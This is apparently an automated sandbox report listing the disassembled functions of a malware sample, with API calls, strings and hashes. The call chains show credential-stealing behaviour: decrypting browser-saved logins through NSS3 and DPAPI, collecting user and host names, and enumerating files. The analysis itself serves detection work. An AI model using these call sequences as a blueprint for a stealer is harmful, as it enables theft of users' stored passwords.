Function 004154E0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction ID: a2db4f6e5da6e8fb8430e81bb17b8e7aa1674d593408b434fe95881a23a64460
Opcode Fuzzy Hash: c4deb19243b673a040dfd5fdc436edaecc4a41164842cb033ff61c0adf53a60f
Instruction Fuzzy Hash: A8E01231A4034CABDB61DB90DC96FDD776C9B44B05F004295BA0C5A1C0DA70AB858BD1

Uniqueness

Uniqueness Score: -1.00%

Function 00401150 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C

Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,04083828,004136EB,0041D6E3), ref: 004143CD
Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC

ExitProcess.KERNEL32 ref: 00401186

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocName$ComputerExitUser
String ID:
API String ID: 1004333139-0
Opcode ID: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction ID: 69e00d56220517d966a61d162f3bbf9e0969f4784ba4f73569e39f9695f87914
Opcode Fuzzy Hash: c5f9d553daa3d293cc675e83c5a49a4e0c2af81821706314cf681e3291f30800
Instruction Fuzzy Hash: 78E012B5E1070462CA1573B27E06BD7729D5F9930EF40142AFE0497253FD2DE45145BD

Uniqueness

Uniqueness Score: -1.00%

Function 00414FF0 Relevance: 1.3, APIs: 1, Instructions: 12COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00414FF8

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction ID: 71a24ea012b18c325b39d17d5ea825459b0100de2daa219f1012b17ed67d7128
Opcode Fuzzy Hash: e14bb29f5c634f52acde74c2c6c6ee0589a433b3a794b1f7692ac0cd2af21e16
Instruction Fuzzy Hash: 1CC012B090410CEB8B00CF98EC0588A7BECDB08200B0041A4FC0DC3300D631AE1087D5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004121F0 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00412200
HeapAlloc.KERNEL32(00000000), ref: 00412207
wsprintfA.USER32 ref: 00412223
FindFirstFileA.KERNEL32(?,?), ref: 0041223A
StrCmpCA.SHLWAPI(?,0041D84C), ref: 00412268
StrCmpCA.SHLWAPI(?,0041D850), ref: 0041227E
FindNextFileA.KERNEL32(000000FF,?), ref: 004122FF
FindClose.KERNEL32(000000FF), ref: 00412314
lstrcat.KERNEL32(?,04083B88), ref: 00412339
lstrcat.KERNEL32(?,04086AF8), ref: 0041234C
lstrlen.KERNEL32(?), ref: 00412359
lstrlen.KERNEL32(?), ref: 0041236A

Strings

%s\%s, xrefs: 00412295
%s\*, xrefs: 00412217

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 13328894-2848263008
Opcode ID: 92269801ec56706d49fbc1ad71996fa168eab42beab98886f9fc838609930503
Instruction ID: 68eafe57ffc654504e5fb8166b756e3a47007b1446461b295be9b39175aa6662
Opcode Fuzzy Hash: 92269801ec56706d49fbc1ad71996fa168eab42beab98886f9fc838609930503
Instruction Fuzzy Hash: 5551A6B5940618ABCB20EBB0DC89FEE737DAB98300F404689F61A96150DF749BC5CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF90 Relevance: 16.6, APIs: 11, Instructions: 93stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040BFC3
lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,040839A8), ref: 0040BFE1
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040BFEC
PK11_GetInternalKeySlot.NSS3 ref: 0040BFFA
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0040C015
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0040C05B
memcpy.MSVCRT ref: 0040C082
lstrcat.KERNEL32(?,0041D726), ref: 0040C0B3
lstrcat.KERNEL32(?,0041D727), ref: 0040C0C7
PK11_FreeSlot.NSS3(?), ref: 0040C0D1
lstrcat.KERNEL32(?,0041D72A), ref: 0040C0E8

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlenmemcpymemset
String ID:
API String ID: 3428224297-0
Opcode ID: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
Instruction ID: c615a08a89d19efff62b5a0e6981dcd2a682f0599fa2db432923c9597831d409
Opcode Fuzzy Hash: 52605990ea01bca17d675fac138a1e19a7de02da9981d5b01ff6e8c7352eb267
Instruction Fuzzy Hash: 22417E75D0420ADBDB20CF90DD88BEEBBB9BB48340F1041A9E605A72C0DB745A84CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040D540 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,0041D746), ref: 0040D58E
StrCmpCA.SHLWAPI(?,0041DC28), ref: 0040D5DE
StrCmpCA.SHLWAPI(?,0041DC2C), ref: 0040D5F4
FindNextFileA.KERNEL32(000000FF,?), ref: 0040DB0A
FindClose.KERNEL32(000000FF), ref: 0040DB1C

Strings

\*.*, xrefs: 0040D556
[@, xrefs: 0040D562, 0040DB2A, 0040D623, 0040D5A5, 0040D626

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: [@$\*.*
API String ID: 2325840235-1445036518
Opcode ID: 38e3d6cce44b768a46b52d0f201da3e53e41ef1bf9bb4bc0dfdcbbefdde4abe9
Instruction ID: 5086e1dd9f189559ddbff5738d7534b81ef4efc7c2da90a7a59429af0ff5c2f4
Opcode Fuzzy Hash: 38e3d6cce44b768a46b52d0f201da3e53e41ef1bf9bb4bc0dfdcbbefdde4abe9
Instruction Fuzzy Hash: 27F1E3759142189ACB15FB61DC91EDE7739AF54304F8142DFA40A62091EF34AFC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 6C366C00 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 190memorytimeCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6C311C6F,00000000,00000004,?,?), ref: 6C366C3F

Part of subcall function 6C3BC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C3BC2BF

PORT_ArenaAlloc_Util.NSS3(?,0000000D,?,?,00000000,00000000,00000000,?,6C311C6F,00000000,00000004,?,?), ref: 6C366C60
PR_ExplodeTime.NSS3(00000000,6C311C6F,?,?,?,?,?,00000000,00000000,00000000,?,6C311C6F,00000000,00000004,?,?), ref: 6C366C94

Strings

gfff, xrefs: 6C366CF5
gfff, xrefs: 6C366CFD
gfff, xrefs: 6C366D9C
gfff, xrefs: 6C366D66
gfff, xrefs: 6C366D30

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Alloc_ArenaErrorExplodeTimeUtilValue
String ID: gfff$gfff$gfff$gfff$gfff
API String ID: 3534712800-180463219
Opcode ID: 4ddfce87d2e82e66b97566d41d5af75aaa41a45a17c97fee88bced650fe4f173
Instruction ID: 1af1337d2e48380ce43d2dd187f18e19722f321ea3b24d4d474f773a73ec61aa
Opcode Fuzzy Hash: 4ddfce87d2e82e66b97566d41d5af75aaa41a45a17c97fee88bced650fe4f173
Instruction Fuzzy Hash: E8514B72B015494FC71CCDADDC626DAB7EAABA4310F48C23AE442DBB85D638D906CB51

Uniqueness

Uniqueness Score: -1.00%

Function 6C428D20 Relevance: 12.7, APIs: 6, Strings: 1, Instructions: 471threadnetworkCOMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C4714E4,6C3DCC70), ref: 6C428D47
PR_GetCurrentThread.NSS3 ref: 6C428D98

Part of subcall function 6C300F00: PR_GetPageSize.NSS3(6C300936,FFFFE8AE,?,6C2916B7,00000000,?,6C300936,00000000,?,6C29204A), ref: 6C300F1B
Part of subcall function 6C300F00: PR_NewLogModule.NSS3(clock,6C300936,FFFFE8AE,?,6C2916B7,00000000,?,6C300936,00000000,?,6C29204A), ref: 6C300F25

PR_snprintf.NSS3(?,?,%u.%u.%u.%u,?,?,?,?), ref: 6C428E7B
htons.WSOCK32(?), ref: 6C428EDB
PR_GetCurrentThread.NSS3 ref: 6C428F99
PR_GetCurrentThread.NSS3 ref: 6C42910A

Strings

%u.%u.%u.%u, xrefs: 6C428E74

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: CurrentThread$CallModuleOncePageR_snprintfSizehtons
String ID: %u.%u.%u.%u
API String ID: 1845059423-1542503432
Opcode ID: 04060341ca8bea48bf6358edfd1980649aaf60253960e12231e40ab3f63b57dc
Instruction ID: 3be79d85efe42b7f9a3fec262eab72a2aedee1331654bcb106c55ccc1f8b47db
Opcode Fuzzy Hash: 04060341ca8bea48bf6358edfd1980649aaf60253960e12231e40ab3f63b57dc
Instruction Fuzzy Hash: 2302AD329052618FEB15CF1AC466F7ABBB2EF52304F19825ACC915BBD1C33AD909C790

Uniqueness

Uniqueness Score: -1.00%

Function 6C3CA480 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,6C3EC3A2,?,?,00000000,00000000), ref: 6C3CA528
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00011843,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C3CA6E0
_byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3CA71B
_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6C3CA738

Strings

9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C3CA6CA
database corruption, xrefs: 6C3CA6D4
%s at line %d of [%.10s], xrefs: 6C3CA6D9

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: _byteswap_ushort$_byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 622669576-598938438
Opcode ID: be56b98f070e0a62287ceed0f173fd7c1ce0b65f175591e55c9e8755a77924d0
Instruction ID: d31640700a5fe5df72b40c81694db4ea3d27c0e4a8a83f96b5ba6f040cd075d1
Opcode Fuzzy Hash: be56b98f070e0a62287ceed0f173fd7c1ce0b65f175591e55c9e8755a77924d0
Instruction Fuzzy Hash: 87919B71B083418BC714CF29C480A5EB7E1BF48318F558A6DE8D58BB91EB75EC85CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C324420 Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,?), ref: 6C324444
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C324466

Part of subcall function 6C371200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C3188A4,00000000,00000000), ref: 6C371228
Part of subcall function 6C371200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6C371238
Part of subcall function 6C371200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6C3188A4,00000000,00000000), ref: 6C37124B
Part of subcall function 6C371200: PR_CallOnce.NSS3(6C472AA4,6C3712D0,00000000,00000000,00000000,?,6C3188A4,00000000,00000000), ref: 6C37125D
Part of subcall function 6C371200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6C37126F
Part of subcall function 6C371200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6C371280
Part of subcall function 6C371200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6C37128E
Part of subcall function 6C371200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6C37129A
Part of subcall function 6C371200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6C3712A1

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C32447A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C32448A
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C324494

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: Util$Item_Zfree$ArenaCriticalFreePoolSectionfree$Arena_CallClearDeleteEnterOnceUnlockValuememset
String ID:
API String ID: 241050562-0
Opcode ID: 41c1357ddd27ed0ab8f2fde78694d24ae8af31fbf9288320a00df81e96892e5f
Instruction ID: ea170d453e65db57ca01989ee4fd653212792e6f60c61fd30f5de09c9d399a84
Opcode Fuzzy Hash: 41c1357ddd27ed0ab8f2fde78694d24ae8af31fbf9288320a00df81e96892e5f
Instruction Fuzzy Hash: C511B7B2D107049BDB20CF65DD815A7B7F8FF592187044B3EE88D52A00F375B5988B91

Uniqueness

Uniqueness Score: -1.00%

Function 00417B4E Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00418E46
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418E5B
UnhandledExceptionFilter.KERNEL32(0041C690), ref: 00418E66
GetCurrentProcess.KERNEL32(C0000409), ref: 00418E82
TerminateProcess.KERNEL32(00000000), ref: 00418E89

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction ID: 5828a94612e18b022276c58097a982c86e574ee0b254963d5fd3238681fe770b
Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
Instruction Fuzzy Hash: 2D21C274A01304EFC721EF54F944B843BB4FB8C309F91907AE64987260E7B456868F9D

Uniqueness

Uniqueness Score: -1.00%

Function 00406C10 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660), ref: 00406C1D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C24
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00406C51
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,`v@,80000001,h0A), ref: 00406C74
LocalFree.KERNEL32(?,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C7E

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
String ID:
API String ID: 3657800372-0
Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
Instruction ID: a62b9dfe9577ca48fe2f29d604933a8f18b811f44e231435f7e1fa1bbfb2df61
Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
Instruction Fuzzy Hash: 01011275A40708BBEB20DF94CD45F9E7779EB44B05F104155F706FB2C0D670AA118BA9

Uniqueness

Uniqueness Score: -1.00%

Function 6C42CDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C42D086
PR_Malloc.NSS3(00000001), ref: 6C42D0B9
PR_Free.NSS3(?), ref: 6C42D138

Strings

>, xrefs: 6C42CF5B

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID: FreeMallocstrlen
String ID: >
API String ID: 1782319670-325317158
Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction ID: 74b28a713d90bd5a968f3f01ac4d7ada2be1c7bf06ac4027dea4eba7c70db0de
Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
Instruction Fuzzy Hash: 91D12962B455560BFB24C87C8CA3FEAB7938B42378F684325D5619BBE5EA1DC843C341

Uniqueness

Uniqueness Score: -1.00%

Function 6C3CAD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.1716571797.000000006C291000.00000020.00000001.01000000.00000015.sdmp, Offset: 6C290000, based on PE: true

Associated: 0000000A.00000002.1716550295.000000006C290000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716705341.000000006C42F000.00000002.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716790130.000000006C46E000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716832674.000000006C46F000.00000008.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716865148.000000006C470000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 0000000A.00000002.1716894914.000000006C475000.00000002.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c290000_u48o.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e644a5cf5a4fee3587e91c2f469431de969cd47f823acd8b5c1756704e264ce9
Instruction ID: 410e806937f26da9d2e7295f2fc2bf679e51f593ed47ee4f9c632492a3e89a7d
Opcode Fuzzy Hash: e644a5cf5a4fee3587e91c2f469431de969cd47f823acd8b5c1756704e264ce9
Instruction Fuzzy Hash: 23F10071F012668BEB05EF29C8907BD77F1AB8A308F154229C945EBB48E7309951CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 004094A0 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F

Memory Dump Source

Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_u48o.jbxd

Yara matches

Similarity

